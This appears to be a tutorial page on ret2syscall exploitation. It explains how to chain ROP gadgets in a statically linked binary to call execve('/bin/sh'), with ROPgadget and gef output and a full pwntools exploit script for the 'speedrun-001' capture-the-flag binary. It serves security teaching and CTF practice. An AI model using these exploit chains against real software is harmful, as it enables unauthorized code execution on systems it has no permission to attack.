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Basic Information

This is similar to Ret2lib, however, in this case we won't be calling a function from a library. In this case, everything will be prepared to call the syscall sys_execve with some arguments to execute /bin/sh. This technique is usually performed on binaries that are compiled statically, so there might be plenty of gadgets and syscall instructions.

In order to prepare the call for the syscall it's needed the following configuration:

  • rax: 59 Specify sys_execve
  • rdi: ptr to "/bin/sh" specify file to execute
  • rsi: 0 specify no arguments passed
  • rdx: 0 specify no environment variables passed

So, basically it's needed to write the string /bin/sh somewhere and then perform the syscall (being aware of the padding needed to control the stack). For this, we need a gadget to write /bin/sh in a known area.

{% hint style="success" %} Another interesting syscall to call is mprotect which would allow an attacker to modify the permissions of a page in memory. This can be combined with ret2shellcode. {% endhint %}

Register gadgets

Let's start by finding how to control those registers:

ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret

With these addresses it's possible to write the content in the stack and load it into the registers.

Write string

Writable memory

First you need to find a writable place in the memory

gef> vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]

Write String in memory

Then you need to find a way to write arbitrary content in this address

ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx

Automate ROP chain

The following command creates a full sys_execve ROP chain given a static binary when there are write-what-where gadgets and syscall instructions:

ROPgadget --binary vuln --ropchain

32 bits

Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx

rop += popRdx           # place value into EAX
rop += "/bin"           # 4 bytes at a time
rop += popRax           # place value into edx
rop += p32(0x6b6000)    # Writable memory
rop += writeGadget   #Address to: mov qword ptr [rax], rdx

rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget

64 bits

Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx

Lacking Gadgets

If you are lacking gadgets, for example to write /bin/sh in memory, you can use the SROP technique to control all the register values (including RIP and params registers) from the stack:

{% content-ref url="../srop-sigreturn-oriented-programming/" %} srop-sigreturn-oriented-programming {% endcontent-ref %}

Exploit Example

from pwn import *

target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')

# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)

# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)

# Our syscall gadget
syscall = p64(0x40129c)

Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget

Prep the four registers with their arguments, and make the syscall

pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0


rop += popRax
rop += p64(0x3b)

rop += popRdi
rop += p64(0x6b6000)

rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)

rop += syscall

# Add the padding to the saved return address
payload = "0"*0x408 + rop

# Send the payload, drop to an interactive shell to use our new shell


Other Examples & References

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Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

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